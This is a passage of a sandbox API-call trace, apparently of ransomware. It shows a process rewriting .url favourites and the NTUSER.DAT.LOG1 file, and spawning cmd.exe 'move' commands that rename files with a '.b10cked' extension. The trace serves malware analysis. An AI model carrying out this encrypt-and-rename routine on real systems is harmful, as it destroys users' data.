lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.702] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.703] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.703] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.703] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.703] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.703] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.703] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN.url", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0214.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN.url", cchWideChar=7, lpMultiByteStr=0x131add4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN.url", lpUsedDefaultChar=0x0) returned 7 [0214.707] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.707] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.707] CloseHandle (hObject=0x120) returned 1 [0214.708] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url") returned 0x2a [0214.708] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.709] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xba4, dwThreadId=0xb34)) returned 1 [0214.924] CloseHandle (hObject=0x1b4) returned 1 [0214.924] CloseHandle (hObject=0x120) returned 1 [0214.924] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.924] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.924] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.924] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.924] ReleaseMutex (hMutex=0xf8) returned 1 [0214.924] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.924] ReleaseMutex (hMutex=0xf8) returned 1 [0214.924] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.924] ReleaseMutex (hMutex=0xf8) returned 1 [0214.924] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.925] ReleaseMutex (hMutex=0xf8) returned 1 [0214.925] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27171419377) returned 1 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.927] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.927] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.928] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.928] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.928] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.928] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.928] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.928] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News.url", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News.url", cchWideChar=14, lpMultiByteStr=0x131324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSNBC News.url", lpUsedDefaultChar=0x0) returned 14 [0214.933] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.933] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.934] CloseHandle (hObject=0x120) returned 1 [0214.934] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL") returned 0x2f [0214.935] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.935] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd40, dwThreadId=0xad4)) returned 1 [0214.937] CloseHandle (hObject=0x1b4) returned 1 [0214.937] CloseHandle (hObject=0x120) returned 1 [0214.937] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.937] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.937] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.937] ReleaseMutex (hMutex=0xf8) returned 1 [0214.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.937] ReleaseMutex (hMutex=0xf8) returned 1 [0214.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.937] ReleaseMutex (hMutex=0xf8) returned 1 [0214.938] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.938] ReleaseMutex (hMutex=0xf8) returned 1 [0214.938] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27172722448) returned 1 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x30400 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 